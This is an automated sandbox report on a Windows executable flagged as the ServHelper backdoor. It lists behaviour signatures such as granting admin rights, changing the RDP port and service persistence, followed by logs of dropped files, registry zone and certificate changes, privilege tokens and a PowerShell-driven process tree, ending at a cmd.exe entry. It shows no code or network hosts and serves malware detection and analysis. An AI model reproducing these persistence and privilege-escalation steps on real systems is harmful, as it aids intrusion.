Malware Analysis Report

2024-10-19 04:38

Sample ID 210924-xj8wjahfe8
Target 5367615a3d3f95eeab592a53716ed3bb.exe
SHA256 af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0
Tags
persistence upx servhelper backdoor discovery exploit trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af7e2ecb8e84ad61c276347e0e766e21a043f2119dacb19ae538bddf5d0452f0

Threat Level: Known bad

The file 5367615a3d3f95eeab592a53716ed3bb.exe was found to be: Known bad.

Malicious Activity Summary

persistence upx servhelper backdoor discovery exploit trojan

ServHelper

Grants admin privileges

Sets DLL path for service in the registry

Blocklisted process makes network request

UPX packed file

Modifies RDP port number used by Windows

Possible privilege escalation attempt

Modifies file permissions

Loads dropped DLL

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Runs net.exe

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-24 18:54

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-24 18:54

Reported

2021-09-24 18:56

Platform

win10v20210408

Max time kernel

69s

Max time network

74s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zheoogak.tjh.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7BA.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI6BC.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI76A.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_c3uacqs4.oep.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI72B.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI7AA.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 628 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 628 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1092 wrote to memory of 2056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2056 wrote to memory of 2452 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2056 wrote to memory of 2452 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1092 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 3976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 2736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 2736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 3812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 3812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 1092 wrote to memory of 3556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1092 wrote to memory of 3556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3556 wrote to memory of 3968 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3556 wrote to memory of 3968 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1092 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
